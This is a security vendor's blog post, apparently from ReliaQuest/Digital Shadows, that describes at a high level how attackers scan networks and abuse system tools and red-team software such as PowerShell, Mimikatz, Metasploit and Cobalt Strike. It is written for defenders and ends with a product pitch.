Research | Our Q3 report details what's new in the world of ransomware.
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Find cyber threats that have evaded your defenses.
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Brands of the world trust ReliaQuest to achieve their security goals.
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
The latest threat research report from ReliaQuest Threat Research research team.
The latest white papers focused on security operations strategy, technology & insight.
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
November 30, 2023
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
Don’t underestimate your adversary—there are some security practitioners out there who might dismiss your everyday hackers and threat actors as typical “script kiddies,” while true in some cases, this is probably not the case in most. Enter the danger of not knowing your enemy
“If you know yourself but not the enemy, for every victory gained you will also suffer a defeat.” (Sun Tzu)
There’s actually a decent chance the people working within today’s various newsmaking threat groups are seasoned system administrators, developers, or security researchers. One can acknowledge it takes serious skills to stay ahead of law enforcement and literally dozens of security companies. Defenders often have to fend off a multitude of attacks; meanwhile, the adversary only needs to hit the target once. Using commercial technology and standard system tools ups the ante for defenders. It’s one thing to flag malicious software use occurring in your network; it’s another altogether when it’s Powershell, for example, and a valid user. The burden is entirely on the network defenders to figure out if the Powershell use is legitimate or if that user has the privileges or need to make those processes occur.
When threat actors “live off the land”, they’re leveraging what’s already on a system or available in the marketplace. It’s essential to understand that even the scariest of threats make use of what’s available: They’re skilled, not to mention it becomes challenging to figure out who’s in the estate if everyone else is using the same tools. Living off the land, so to speak, is a hallmark of highly proficient threats. They can work well with not only their own bespoke technology but are also very comfortable with what’s on the market. In this blog, I’ll talk a little bit about some of the ways adversaries are using to try to get in, as well as what they do with system tools and off-the-shelf if they manage to get inside.
If you have network infrastructure exposed to the internet at large, you’ve seen the marks of scanners in network logs. Using the analogy of a locked building, scanners typically knock on doors and lightly turn door handles while also noting where windows have curtains open or drawn. Scans are used by friend and foe to find vulnerabilities, so it’s important to understand the roles they play: Adversaries are using them in bulk to find vulnerable infrastructure to attack, while defenders are using them to stay compliant and patched.
Scanners range from tools that perform basic network mapping, such as Nmap, to more in-depth and specialized scanners, such as Nessus or OpenVAS, which might look at vulnerabilities with more context. There are also scanners that look at specific web applications. Some are paid, while others are free. Alongside the scans from the good guys and the bad guys, researchers and security companies conduct various passive and active scans for analysis and reporting. Finally, in one more layer of noise, your own security vendor may also conduct regular scans for security, compliance, or penetration testing.
The topic of scanning shows up on various dark web forums and marketplaces. For example, in one recent forum post, a longtime contributor made an exhaustive list of every single type of scanner and its capabilities, numbered into the dozens. In addition to this, dark websites are often filled with various posts around scanning, including purchasing services, friendly how-to articles, and ratings for multiple tools.
So, what can we as security practitioners do about scanning? Fixes sound simple in the abstract but can be difficult in practice. Generally, it means keeping the external stuff patched, for starters. It may also involve extra work to ensure web servers and applications are not returning stack trace or default version information to help attackers craft future exploits.
On a practical note, an organization should audit and close off unneeded services and ports to the world while also hardening what needs to be public. Blocking known bad IP ranges and ISPs can help reduce the noise from scanning; however, without a lot of context around specific infrastructure or actor methods (which are ever-changing), attribution of scanning can be difficult. This is especially true for uncovering malicious scans since a rented botnet can handle the scanning at a distributed, large, and relatively anonymous scale.
Once inside the network, we move to the concept of “living off the land”. As we mentioned before, there’s a pretty good chance that an adversary who ends up inside the castle walls is probably familiar with system tools. It’s not uncommon to see malicious use of Linux’s bash shell script or Windows Powershell. There are dozens of ways to “hack in”. On a low-and-slow attack, an adversary might enter and watch the environment for a time to ascertain what’s normal, find their location with a network, test connectivity, or perhaps learn about the user profile they now own. If configurations don’t allow for things like downloads or executing files, a piece of custom tooling might be a perfect solution but runs the risk of getting caught quickly by security tools or settings.
Searching on just “bash” alone on the Mitre ATT&CK page reveals dozens of instances of bash use tied to known APT tactics, malware techniques, and various enterprise and mobile tactics. Powershell is no different and is also highly favored for all of its uses. It’s been seen in at least four out of eleven CISA alerts from the first half of 2021 and shows no sign of slowing down, especially when tied with other threat tactics.
Other system tools can help with establishing a presence within a network. Examples of this behavior may look like:
In addition, users with elevated privileges can dump system processes to discover logins and credentials or use them to create new user accounts to stay inside, much as the community observed during the “Great Exchange grab” of 2021.
Threat hunting can often discover these system behaviors, but this can take time. In its simplest explanation, threat hunting is looking for an incident without an actual incident occurring. A threat hunter working through logs to discover these system anomalies often needs to know what looks normal in a given environment. Hunting also requires knowledge of how system tools and processes interact and what seems legitimate versus an actual malicious event. Administrators can lock down features like Powershell having administrative rights, but it’s not always perfect. Taken in with other indicators and questions, however, sometimes the clues are there in plain sight.
Sometimes, the system tools aren’t enough, but there are other legitimate tools that can do the job instead. Sometimes these tools are commonly found within an organization for various needs, and threat actors have also adopted them for ease of use. While this is by no means a complete listing, these are some of the names that often surface in security articles and product demonstrations. They also feature heavily in MITRE ATT&CK analysis of known adversary tactics and techniques.
One of the most familiar tools for these jobs is Mimikatz, which has been around for decades. Originally designed as a proof-of-concept for Microsoft vulnerabilities, it has grown in capability, including some magic around credentials and user accounts. While it’s likely that it’s been flagged by many security tools out there, it remains free, available, and updated. Given its signature is probably well-known, chances are that if Mimikatz pops up on a network, it’s a bad sign, whether a bad practice or adversary tactic. There are also variants such as MimiPenguin that have similar capabilities, only on Linux machines.
Probably the next most notorious of these technologies is Metasploit, which was initially developed for penetration testing. The framework was designed to be adaptable while staying open-source, which means legitimate red teams use it, along with the adversaries they’re emulating. What made it so popular and accessible was because it was essentially a scanner that you can load exploits into once someone found a vulnerability. It can be used across a variety of operating systems and has modularity across variants. This is another one whose signature is well known, so if you’re not undergoing a pen test and see Metasploit active, it’s probably not for something good.
Finally, the upstart that has shown up recently is Cobalt Strike. Listed as the #2 threat in Red Canary’s 2021 Threat Detection Report, it’s another tool designed for red teaming. For red team purposes, it shows network defenders how to defend against a fast-moving attacker using some of the latest tactics, which may take an adversary just minutes and hours to achieve objectives. It has evolved into a Swiss Army knife of offensive capabilities that mirrors and bests some of what other red team tools can do. It does really “fun” things like process injection and can launch its payload, known as a Beacon, via several Windows system tools like Powershell or COM, which makes it useful to adversaries. It gained a lot of popularity with ransomware this year, and several known attacks included indicators of Cobalt Strike, in addition to some historical examples with APTs and other criminal actors.
One of the most straightforward and most interesting infographics in threat intelligence (next to the intelligence cycle, of course) is the Pyramid of Pain concept. The premise is simple: If you can deny an adversary their tactics, techniques, and procedures (TTP), you’ve caused them a great deal of pain. Much more than your typical static indicators of compromise, as David Bianco writes, since TTPs are actual behavior rather than tools, these require a great deal of rethinking and retooling if prevented by defensive tactics. In this instance, if the defense is good, rather than rethinking and retooling, they’ll probably move on to an easier target.
This is why it’s crucial to understand how effectively adversaries use system tools and commercial software. Adversaries know these are cost-effective and require very little investment, especially when bringing other groups into their exploits. It’s probably less to have to teach and learn with common tools available. Also, why burn a perfectly good zero-day on a problem that can be solved with an open-source red team tool; or spend money to develop malware when other options are freely available? They’re also banking on organizations being soft targets who rely on the lower levels of the Pyramid of Pain. Static indicators have their use, but the actual behaviors, tools, and process artifacts cause the most pain for adversaries.
At Digital Shadows (now ReliaQuest), we can help you in your quest to deny adversaries a foothold in your environment. Our intelligence comes from monitoring the dark web, catching the chatter on specific campaigns and threat actors, and sometimes talking about what they’re using against the community. For example, we see when you have data exposed that adversaries can use or when they’re registering domains to spoof your customers or abuse your intellectual property. If you’re curious about where you stand with your risk management, take SearchLight (now ReliaQuest’s GreyMatter Digital Risk Protection) with a free demo. We’re happy to help you understand the risk you take and provide some solutions to help mitigate that risk.